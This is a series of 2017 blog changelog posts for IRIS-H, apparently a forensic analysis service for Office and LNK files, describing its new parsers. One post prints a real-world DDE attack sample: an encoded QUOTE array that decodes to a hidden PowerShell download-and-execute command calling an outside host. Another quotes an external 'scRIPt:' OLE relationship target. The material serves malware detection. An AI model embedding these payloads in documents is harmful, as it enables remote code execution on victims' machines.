<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">"Footer Part </span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">contains the information about a footer displayed for one or more sections. Each Footer part is the target of an explicit relationship in the part-</span></span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">relationship item for the Main Document. Each footer has a corresponding '<b>ftr</b>' element in a Footer part, which contains the text of the footer.</span></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">" </span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">- </span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">ECMA-376 Part 1 (section 11.3.6)</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">A new parser for OOXML 'Footer Part' has been added to IRIS-H. The parser will detect and extract text content including special field characters. The extracted content can be found in a new panel under '<b>Individual Components</b>' section on the report page. See an example below:</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFrcguC2UslgZJRpSu7izf_ICu-8U3JtkJasch6WdUeR17ESq1bcVwK4ra1OtJ3gGvU9U7oA9hke434EB9J7JJJJeRth2Wf806GhRtitFCWVgxNBOeAqGBQ_4VRU1BNLhrok2AmYjrV-Ln/s1600/footer_example.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="290" data-original-width="630" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFrcguC2UslgZJRpSu7izf_ICu-8U3JtkJasch6WdUeR17ESq1bcVwK4ra1OtJ3gGvU9U7oA9hke434EB9J7JJJJeRth2Wf806GhRtitFCWVgxNBOeAqGBQ_4VRU1BNLhrok2AmYjrV-Ln/s320/footer_example.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example of a Footer Part panel showing extracted text content.</td></tr>
</tbody></table>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">If the extracted content includes special field characters, they will be analysed for presence of blacklisted field character command and if any detected, the findings will be populated in '<b>Malicious Findings</b>' panel on the report page. Below is the corresponding findings panel:</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg08ToJk5QbqQIKYnKzAm3l48DioI9SaVRbeyMklVo7oXwzVrEHYP2bEP0d2JO0JAKRa6QrFoMPPO4DnAHyTtcQY14tA35Ldy-BzXWUrftZJFj5yMjCCqxNS8xM686ZGxYO35bUCdb3HrRe/s1600/findings_example.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="316" data-original-width="623" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg08ToJk5QbqQIKYnKzAm3l48DioI9SaVRbeyMklVo7oXwzVrEHYP2bEP0d2JO0JAKRa6QrFoMPPO4DnAHyTtcQY14tA35Ldy-BzXWUrftZJFj5yMjCCqxNS8xM686ZGxYO35bUCdb3HrRe/s320/findings_example.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Corresponding findings panel showing detected field character type</td></tr>
</tbody></table>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">Full report for the example above can be found here - </span><a href="https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e" rel="nofollow" style="font-family: "trebuchet ms", trebuchet, sans-serif;" target="_blank">https://iris-h.malwageddon.com/report/380710e90e15242de982aede9a62c66e</a><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-33297338099441016562017-11-09T22:09:00.000+00:002017-11-09T22:10:05.774+00:00IRIS-H (alpha): Added OOXML Relationships file parser<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: new feature</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API & UI (clear browser cache to see the changes)</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: Parser for OOXML "Relationships" file has been added. The parser detects and extracts hyperlinks to external sources.</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: None</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"></span><b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">"Relationships are represented in XML in a Relationships part. Each part in the package that is the source of one </span></span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">or more relationships can have an associated Relationships part. This part holds the list of relationships for the </span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">source part." - </span><span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">ECMA-376 Part 2 (section 9.3.3)</span></span><br />
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;"><br /></span></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhraPHTHmQmlISc0u11tSGr8T9vflxdw9M0NygbKG6ogxwKfE56VWlf5J4w_cvEX_Tm1p6mqsqHG4JfnLztAHgaDcI0y5EDLczuXZm1bYl4j7ETJH-eWqK3M0yAdMhPTVhycHDKbYFo7gVD/s1600/rels_example.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="149" data-original-width="1246" height="38" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhraPHTHmQmlISc0u11tSGr8T9vflxdw9M0NygbKG6ogxwKfE56VWlf5J4w_cvEX_Tm1p6mqsqHG4JfnLztAHgaDcI0y5EDLczuXZm1bYl4j7ETJH-eWqK3M0yAdMhPTVhycHDKbYFo7gVD/s320/rels_example.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Relationships file example</td></tr>
</tbody></table>
<span style="color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="font-size: 13px;">A new parser for OOXML Relationships file has been added to IRIS-H. The parser is configured to read every Relationship in the Relationships file and extract hyperlinks pointed at external sources. See below for an example of a Relationship that will be detected:</span></span><br />
<blockquote class="tr_bq">
<Relationship Id="_id_1633" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" TargetMode="External" Target="scRIPt:https://filetea.me/n3wBS7q8XNvRjiEwg8ZL2bXhw/dl" /></blockquote>
<br />
The extracted hyperlinks will be displayed under "Suspicious Finding" panel. See below for an example:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrqiFb9guyI56J6Zd388nyfL5d_eHBtxmAE1LVmxu93PQaRH8mmsRCKbR_T__04BjBC6p9siD4GYoUNwEnJJX3MxQy-MyOwVC1bgLgoP9suGnbUgVQczHITllOxsvFEPGsROlzd5CDhsIa/s1600/findings.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="258" data-original-width="627" height="131" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrqiFb9guyI56J6Zd388nyfL5d_eHBtxmAE1LVmxu93PQaRH8mmsRCKbR_T__04BjBC6p9siD4GYoUNwEnJJX3MxQy-MyOwVC1bgLgoP9suGnbUgVQczHITllOxsvFEPGsROlzd5CDhsIa/s320/findings.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">"Suspicious Findings" example showing detected hyperlinks</td></tr>
</tbody></table>
<br />
Full report for the example above can be found here - <a href="https://iris-h.malwageddon.com/report/7b133ac4016aab06fff2c24e5d9e9e97" rel="nofollow" target="_blank">https://iris-h.malwageddon.com/report/7b133ac4016aab06fff2c24e5d9e9e97</a><br />
<br />
<u><b>NOTE</b></u><br />
IRIS-H UI changes might require your Internet browser cache clean up for iris-h.malwageddon.com website to take effect.<br />
<br />
<br />
<br />Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-77888004345769972712017-11-08T00:19:00.002+00:002017-11-09T21:36:08.616+00:00IRIS-H (alpha): Updated Field Characters Parser<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Quick Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b>
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Build Version</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: 0.0.1(alpha)</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Change Type</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: feature improvement</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Affected Components</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: API</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Short Description</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: Parser for Field Characters used in OLE and OOXML documents has been updated to improve detection. QUOTE, SET, REF field characters have been added to the reporting.</span><br />
<b style="background-color: white; color: #666666; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: 13px;">Outstanding Tasks</b><span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;">: None</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , "trebuchet" , sans-serif; font-size: 13px;"><br /></span>
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;">Detailed Summary</b><br />
<b style="background-color: white; color: #3d85c6; font-family: "Trebuchet MS", Trebuchet, sans-serif; font-size: x-large;"><br /></b>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white;">Field Character extraction and parsing code has been improved to allow for decoding QUOTE command arguments. The change was motivated by McAfee's blog <a href="https://securingtomorrow.mcafee.com/mcafee-labs/apt28-threat-group-adopts-dde-technique-nyc-attack-theme-in-latest-campaign/#sf151634298" rel="nofollow" target="_blank">post</a> today referencing OOXML document used in an APT type of attack. Document's XML code snippet below show an example of what field characters are used and how they are present in the code.</span></span><br />
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQvP2TwHMu5HpUcVo9D3OHdfieSSaJQ0LcZIzOxShANU9dO423DFfzY5SIS8Mo7r8JwAD8guTdL1Xr_OC8UAX5xxk03fZ_de5p-jn79wzWok_ytZ68MckrclS0OIT3l7AZMnp3cFEww2DG/s1600/quote.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="497" data-original-width="745" height="213" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQvP2TwHMu5HpUcVo9D3OHdfieSSaJQ0LcZIzOxShANU9dO423DFfzY5SIS8Mo7r8JwAD8guTdL1Xr_OC8UAX5xxk03fZ_de5p-jn79wzWok_ytZ68MckrclS0OIT3l7AZMnp3cFEww2DG/s320/quote.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">QUOTE field character usage example</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGtE5DCiZazmZoc-TQbnoWay7aNW4XZAkSRMPyUIabQvgvZE8rfn0JB3hwjsvZziTH6Ntas61vr3XaDby9geSAwpkvrjmqFX-1qWI8TbsX1recKs675OxH-LirXNsPFoDrnEDaHdRa3zYJ/s1600/dde.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="844" data-original-width="420" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGtE5DCiZazmZoc-TQbnoWay7aNW4XZAkSRMPyUIabQvgvZE8rfn0JB3hwjsvZziTH6Ntas61vr3XaDby9geSAwpkvrjmqFX-1qWI8TbsX1recKs675OxH-LirXNsPFoDrnEDaHdRa3zYJ/s320/dde.PNG" width="159" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">DDE field character and the way its arguments are assembled</td></tr>
</tbody></table>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white;">Unlike previous instances of DDE and DDEAUTO field character usage in malicious documents, this document doesn't expose the command arguments that normally contain indicators of compromise. Instead, a combination of other field characters is used to store and assemble the command arguments.</span></span><br />
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white;"><br /></span></span>
<span style="font-family: "trebuchet ms" , "trebuchet" , sans-serif;"><span style="background-color: white;">SET command is used to store the value produced by QUOTE command and later passed to DDE command through REF field character. Below is an example of that:</span></span><br />
<blockquote class="tr_bq">
SET c QUOTE 67 58 92 80 114 111 103 114 97 109 115 92 77 105 99 114 111 115 111 102 116 92 79 102 102 105 99 101 92 77 83 87 111 114 100 46 101 120 101 92 46 46 92 46 46 92 46 46 92 46 46 92 87 105 110 100 111 119 115 92 83 121 115 116 101 109 51 50 92 87 105 110 100 111 119 115 80 111 119 101 114 83 104 101 108 108 92 118 49 46 48 92 112 111 119 101 114 115 104 101 108 108 46 101 120 101 32 45 78 111 80 32 45 115 116 97 32 45 78 111 110 73 32 45 87 32 72 105 100 100 101 110 32 36 101 61 40 78 101 119 45 79 98 106 101 99 116 32 83 121 115 116 101 109 46 78 101 116 46 87 101 98 67 108 105 101 110 116 41 46 68 111 119 110 108 111 97 100 83 116 114 105 110 103 40 39 104 116 116 112 58 47 47 110 101 116 109 101 100 105 97 114 101 115 111 117 114 99 101 115 46 99 111 109 47 99 111 110 102 105 103 46 116 120 116 39 41 59 112 111 119 101 114 115 104 101 108 108 32 45 101 110 99 32 36 101 32 35 </blockquote>
'c' variable now holds the output (character string built from the array of character codes) from QUOTE command. Later 'c' is referenced in DDE command call as one of the arguments.<br />
<blockquote class="tr_bq">
DDE REF c </blockquote>
When DDE command is called, the value of 'c' variable will be used as its argument.<br />
<br />
IRIS-H field character handlers have been updated to be able to extract the character codes array associated with QUOTE command and decode it. If extraction and decoding is successful the report page will contain the output similar to the one below.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiABU77Ww7ZC8p94Gdoo5egxuOAGo4xmxr478hitzt587dkp9xjf0DQZvz8o-bicPcFLDkGGyDLbAhLyoHrQ8BYd3QYOzliT6H7mljvoNhe36eyXGTLvLMZ5bHWfc3gPDXvs8RH35lDns3R/s1600/new_detection.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="379" data-original-width="753" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiABU77Ww7ZC8p94Gdoo5egxuOAGo4xmxr478hitzt587dkp9xjf0DQZvz8o-bicPcFLDkGGyDLbAhLyoHrQ8BYd3QYOzliT6H7mljvoNhe36eyXGTLvLMZ5bHWfc3gPDXvs8RH35lDns3R/s320/new_detection.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Example of QUOTE command evaluation</td></tr>
</tbody></table>
This method of using field characters presents new challenges, especially around reconstructing the original text in the same sequence as it appears in the document when it's opened with its corresponding host application. IRIS-H will still attempt to extract all the text fields, but the original text appearance sequence cannot be guarantied.<br />
<br />
Full report can be found here - <a href="https://iris-h.malwageddon.com/report/e0b8c953e3e6c3f133d1d9301e8eb15a" rel="nofollow" target="_blank">https://iris-h.malwageddon.com/report/e0b8c953e3e6c3f133d1d9301e8eb15a</a><br />
<br />Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-64493149413619951832017-11-07T00:22:00.000+00:002017-11-07T00:22:01.353+00:00IRIS-H (alpha): Added support for Shell Link (.LNK) files<span style="color: #3d85c6; font-size: x-large;"><b>Quick Summary</b></span><br />
<b><br /></b>
<b>Build Version</b>: 0.0.1(alpha)<br />
<b>Change Type</b>: new feature<br />
<b>Affected Components</b>: API & UI<br />
<b>Short Description</b>: Shell Link (.LNK) file format parser has been added to API component. Cosmetic changes to UI to align new data view with the existing format.<br />
<b>Outstanding Tasks</b>: Implement support for missing Extra Data Blocks<br />
<br />
<span style="color: #3d85c6; font-size: x-large;"><b>Detailed Summary</b></span><br />
<div>
<br />
New binary data parser has been added to IRIS-H service. It can handle processing and extracting digital artifacts from Shell Link (.LNK) files. The service now accepts LNK files through Submission page and can also automatically detect them embedded into submitted documents. In either case, the report page will display extracted binary data enriched with human readable description. The enrichment process references the official Microsoft specification for <a href="https://msdn.microsoft.com/en-us/library/dd871305.aspx" rel="nofollow" target="_blank">[MS-SHLLINK]</a> Binary File Format.<br />
<br />
The parser fully supports the following LNK file structures:<br />
<br />
<ul>
<li>ShellLinkHeader</li>
<li>LinkTargetIDList</li>
<li>LinkInfo</li>
<li>StringData</li>
</ul>
<div>
ExtraData structure is partially supported at this time. Only the following Data Blocks will be processed:</div>
<div>
<ul>
<li>EnvironmentVariableDataBlock</li>
<li>KnownFolderDataBlock</li>
<li>SpecialFolderDataBlock</li>
<li>TrackerDataBlock</li>
<li>PropertyStoreDataBlock</li>
</ul>
<div>
Once all binary data is extracted, it'll be subject to a rule-based evaluation. The conclusion will be drawn if the submitted or embedded LNK file can be harmful. IRIS-H will attempt to reconstruct the command line including arguments if any. Below is an example of rule-based evaluation results.</div>
</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCCx9PosSlnGAbT2UdLrO7338Gd6CDLFZTHsM8jBTU6oQ5_pVcH4zEF9YqbVjs2zpTrE-cFwfxzEjZJLthq7Idg8rhB9oJ-kxjNITLgRZnfFyH8LegaIMuVvFoeUEWfUEj0qstcoBqfVNP/s1600/mal_findings.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="258" data-original-width="728" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCCx9PosSlnGAbT2UdLrO7338Gd6CDLFZTHsM8jBTU6oQ5_pVcH4zEF9YqbVjs2zpTrE-cFwfxzEjZJLthq7Idg8rhB9oJ-kxjNITLgRZnfFyH8LegaIMuVvFoeUEWfUEj0qstcoBqfVNP/s320/mal_findings.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">LNK file rule-based evaluation results</td></tr>
</tbody></table>
<div>
A few new sections have been added to "Informational Findings" panel. The sections display information relevant to the LNK file target; file path, working directory, relevant path, command-line arguments, etc. One particular section - "Link Target Tracking" will contain the evaluation results of the data stored in the following Data Blocks:</div>
<div>
<ul>
<li>Droid Volume Identifier</li>
<li>Droid File Identifier</li>
<li>Birth Droid Volume Identifier</li>
<li>Birth Droid File Identifier</li>
</ul>
Based on this data, IRIS-H will try to identify if the link target file was moved between the volumes on the original computer or if it was moved to another machine. For more information see page 10 of this <a href="http://computerforensics.parsonage.co.uk/downloads/TheMeaningofLIFE.pdf" rel="nofollow" target="_blank">PDF</a>. Below is an example of "Informational Findings" view.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTcf4tP9ZxvOK3TCM_iS0i2lSZXK8JPCP3ZL7gTkneQ8a23xAZBuYDsev6qZShtWnXWpwNvehKwKl7hQ8GT9vniPWZ45F3onnGn7x9Eb2Wl5_ZfROeYh29j-vriCK7gPoIQpckjxJ0Coo1/s1600/inf_findings.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="236" data-original-width="735" height="102" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTcf4tP9ZxvOK3TCM_iS0i2lSZXK8JPCP3ZL7gTkneQ8a23xAZBuYDsev6qZShtWnXWpwNvehKwKl7hQ8GT9vniPWZ45F3onnGn7x9Eb2Wl5_ZfROeYh29j-vriCK7gPoIQpckjxJ0Coo1/s320/inf_findings.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">LNK file Informational Findings example</td></tr>
</tbody></table>
<div>
"Detailed Components Breakdown" section of the report contains all the data IRIS-H could extract from an LNK file. I was personally surprised to find out how much those little files actually contain. For example, TrackerDataBlock holds the Link Target originator machine's NetBIOS name and MAC address. See below for an example.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX_23coych3qeNapJKIllG9iAmH-LkfcN0H1mHjrsgbjkrtcGuX2wBPEjEoSRS90iDkSTgLzLLtWd_di0Aau6xXUuRWviC26wZF059gWCAfoF_NXYqVjOQIljaNPWgZZKH3tX6B8bwQVZ8/s1600/trackerDataBlock.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="417" data-original-width="732" height="182" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgX_23coych3qeNapJKIllG9iAmH-LkfcN0H1mHjrsgbjkrtcGuX2wBPEjEoSRS90iDkSTgLzLLtWd_di0Aau6xXUuRWviC26wZF059gWCAfoF_NXYqVjOQIljaNPWgZZKH3tX6B8bwQVZ8/s320/trackerDataBlock.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Data derived from TrackerDataBlock</td></tr>
</tbody></table>
<div>
</div>
<br />
ShellLinkHeader section contains time stamps associated with Link Target, as well as, its file attributes, the type of the media it resides on(hard disk, USB, network, etc), media serial number and even command line window state. See below for an example.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6RsHB0Ev2NIkaPG_O1vnb274YMimOl74egwzeL9-wpokWwWxG4RAuYeCLRCxZBrZQfJp4nALKA7iddDxB2yehnD7K4k_DVQqsPOzLeevEl4aCIhcR7xIhtZ33HprM6gNm7jilH6oHYGs7/s1600/shellLinkHeader.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="875" data-original-width="735" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6RsHB0Ev2NIkaPG_O1vnb274YMimOl74egwzeL9-wpokWwWxG4RAuYeCLRCxZBrZQfJp4nALKA7iddDxB2yehnD7K4k_DVQqsPOzLeevEl4aCIhcR7xIhtZ33HprM6gNm7jilH6oHYGs7/s320/shellLinkHeader.PNG" width="268" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Data derived from ShellLinkHeader</td></tr>
</tbody></table>
<div>
In addition, IRIS-H will attempt to resolve "Known Folder" GUID and "Special Folder" ID and display their corresponding descriptions. See an example below.</div>
<div>
<br /></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPGnVXtDa2RSiBK_anuY8bio_-KZ7tWey3npQKezoGWqX0SgfRFR-UUlEUs2cUhoBxbJGJl5L3e4d_iAGEteNgjDzQf1_MgQussDfPNjE4NOhUp8XjJqwtxNx8oEPjE7rlxSGN0OA4R-za/s1600/folders.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="399" data-original-width="732" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPGnVXtDa2RSiBK_anuY8bio_-KZ7tWey3npQKezoGWqX0SgfRFR-UUlEUs2cUhoBxbJGJl5L3e4d_iAGEteNgjDzQf1_MgQussDfPNjE4NOhUp8XjJqwtxNx8oEPjE7rlxSGN0OA4R-za/s320/folders.PNG" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Enriched data derived from KnownFolderDataBlock and SpecialFolderDataBlock</td></tr>
</tbody></table>
<div>
Examples of full reports can be found on the links below:</div>
<div>
<br /></div>
<div>
<a href="https://iris-h.malwageddon.com/report/50146115513f71531ea334071c69a771">https://iris-h.malwageddon.com/report/50146115513f71531ea334071c69a771</a> - submitted LNK file.</div>
<div>
<a href="https://iris-h.malwageddon.com/report/738e74f744e554d6ac89899357eca506">https://iris-h.malwageddon.com/report/738e74f744e554d6ac89899357eca506</a> - embedded LNK file found in a Microsoft Office document.</div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
<br /></div>
Denis O'Brienhttp://www.blogger.com/profile/07233679823730420087noreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-74372382108888405662017-09-21T20:13:00.002+01:002017-10-30T14:14:08.380+00:00Announcement: IRIS-H (alpha) - Online Digital Forensic Tool for Microsoft Office Files<div class="separator" style="clear: both; text-align: center;">
</div>
